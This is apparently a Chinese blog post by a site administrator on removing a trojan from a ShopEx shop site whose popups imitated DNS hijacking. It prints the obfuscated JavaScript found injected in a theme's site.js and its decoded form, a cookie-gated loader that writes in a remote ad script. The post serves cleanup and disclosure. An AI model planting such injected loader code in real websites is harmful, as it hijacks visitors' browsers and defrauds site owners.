shopex木马清除 DNS劫持清除

所在公司一网站系很久前制作,使用的网站程序是shopex ,此程序不开源,然后论坛的修补补丁多而且杂乱,一直以来未升级,加上虚拟主机使用php 3.2 ,虚拟有源码泄露的漏洞,诸多原因导致网站一度被挂马,升级后发现还是有以下症状:

首次打开网站的时候弹出路由器输入密码窗口,然后还会弹出其他一些网页游戏的页面

SouthEast


模仿的是DNS劫持,估计木马设计者的初衷是误导站长,让别人以为是局域网的DNS劫持,而不是网站的问题,实际在清除木马过程中,我也确实一直被误导,以为是局域网问题,就没有怎么管它,只是对程序进行了全面的升级,服务器空间也换了,之后发现还是会弹出窗口,没办法就换了下模板试试,发现换模板之后就没出现弹窗了,原来是模板也被改写了,经查,发现此文件比较可疑

文件:thmes/模板/images/site.js

if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%3E%42%41%49%44%55%5F%43%4C%42%5F%53%4C%4F%54%5F%49%44%20%3D%20%22%38%30%32%37%39%31%22%3B%3C%2F%73%63%72%69%70%74%3E%0D%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%63%62%6A%73%2E%62%61%69%64%75%2E%63%6F%6D%2F%6A%73%2F%6F%2E%6A%73%22%3E%3C%2F%73%63%72%69%70%74%3E'));}

用站长工具转码发现其内容是

if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('<script type="text/javascript" >BAIDU_CLB_SLOT_ID = "802791";</script>
<script type="text/javascript" src="http://cbjs.baidu.com/js/o.js"></script>'));}


将这段代码整体去掉就没事了


你可能感兴趣的:(SHOPEX,DNS劫持,shopex木马)